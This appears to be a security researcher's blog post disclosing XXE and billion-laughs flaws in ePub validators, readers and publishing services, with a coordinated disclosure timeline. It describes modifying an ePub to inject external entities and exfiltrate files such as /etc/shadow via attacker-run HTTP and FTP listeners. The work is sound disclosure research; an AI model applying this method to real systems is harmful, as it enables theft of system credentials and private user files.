“We use the ePub format - it is the most popular open book format in the world. We’re very excited about this.” - Steve Jobs, 2010 (original iPad launch)
TLDR; Applying a familiar XXE pattern to exploit services & readers that consume the ePUB format. Exploiting vulnerabilities in EpubCheck <= 4.0.1 (ePub Validation Java Library & tool), Adobe Digital Editions <= 4.5.2 (book reader), Amazon KDP (Kindle Publishing Online Service), Apple Transporter, and Google Play Book uploads, etc.
ePub is a standard format for open books maintained by IDPF (International Digital Publishing Forum). IDPF is a trade and standards association for the digital publishing industry, set up to establish a standard for ebook publishing. Their membership list: http://idpf.org/membership/members
ePub uses XML metadata to define the document structure, support digital signatures, digital rights (DRM) etc.
eg., epub archive:
eg., contents of META-INF/container.xml
eg., contents of book.opf
When I first started looking into this, I learned about a tool/Java library called EpubCheck (provided by IDPF) that is used to validate books in the ePub format. Book publishers tend to perform a validation step using something like this to check the format validity. The validator tool/library was vulnerable to XXE, so any application that relies on a vulnerable version to check the validity of a book would be susceptible to this type of attack.
Modifying an existing ePub file to test for XML parsing vulnerabilities:
curl https://s3-us-west-2.amazonaws.com/pressbooks-samplefiles/MetamorphosisJacksonTheme/Metamorphosis-jackson.epub -o book.epub
unzip book.epub; rm book.epub
Edit any of the files that contain XML metadata.
eg., book.opf (XXE - XML External Entities pattern)
zip -r book.epub *
Point at a HTTP server to serve the following contents, and specifying a FTP server to recieve the specified file
EpubCheck <= 4.0.1
There was a online instance of EpubCheck, that would accept user uploads and perform validation on the format. This provides an example of how this vulnerability could be used to attack online services that support ePub in some way, if they are using a vulnerable version of EpubCheck to validate the uploaded file.
Uploading our created file:
HTTP listener receiving the dtd request when parsed by the remote XML parser, and custom FTP listener receiving the file (I didn’t think it would work, but specified /etc/shadow as the file to retrieve).
This means that we accidentally retrieved the /etc/shadow file. Public facing web apps running as root/system in prod… 😫
A few examples of other services, and applications I came across that were vulnerable:
Amazon KDP which allows publishers to upload books, was susceptible to XXE when converting books to the Kindle format.
External DTD specifying the file to retrive:
eg., Retrieving secret stuff from a users Windows documents folder:
Apple Transporter (underlying tool used to validate metadata and assets and deliver them to the iTunes Store), CVE-2016-7666.
Google Play Book uploads did not allow external entity processing, but was vulnerable to XML exponential entity expansion billion laughs. When uploading a ePub with this pattern, it would spend about 45 minutes trying to process the file before returning an error condition. Google confirmed this on their side.
Disclosure timeline stuff:
- Sep 2016: Reported XXE in EpubCheck <= 4.0.1.
- Sep 2016: Reported XXE in Adobe Digital Editions <= 4.5.2.
- Sep 2016: Reported XXE in Amazon KDP.
- Oct 2016: Reported XXE in Apple Transporter
- Oct 2016: Reported XML exponential entity expansion in play.google.com book uploads.
- Dec 2016: Coordinated disclosure.
- Jan 2017: This blog post (lots of time for users to patch).
Thanks to CERT/CC for their help in coordinating with different vendors & IDPF, and setting a disclosure timeline. I only tested a handful of digital readers and services, so if you find other vulnerable readers/services, tell CERT/CC (they were tracking the ePubCheck issue as VU#779243).
If you got this far, thanks for reading. 👋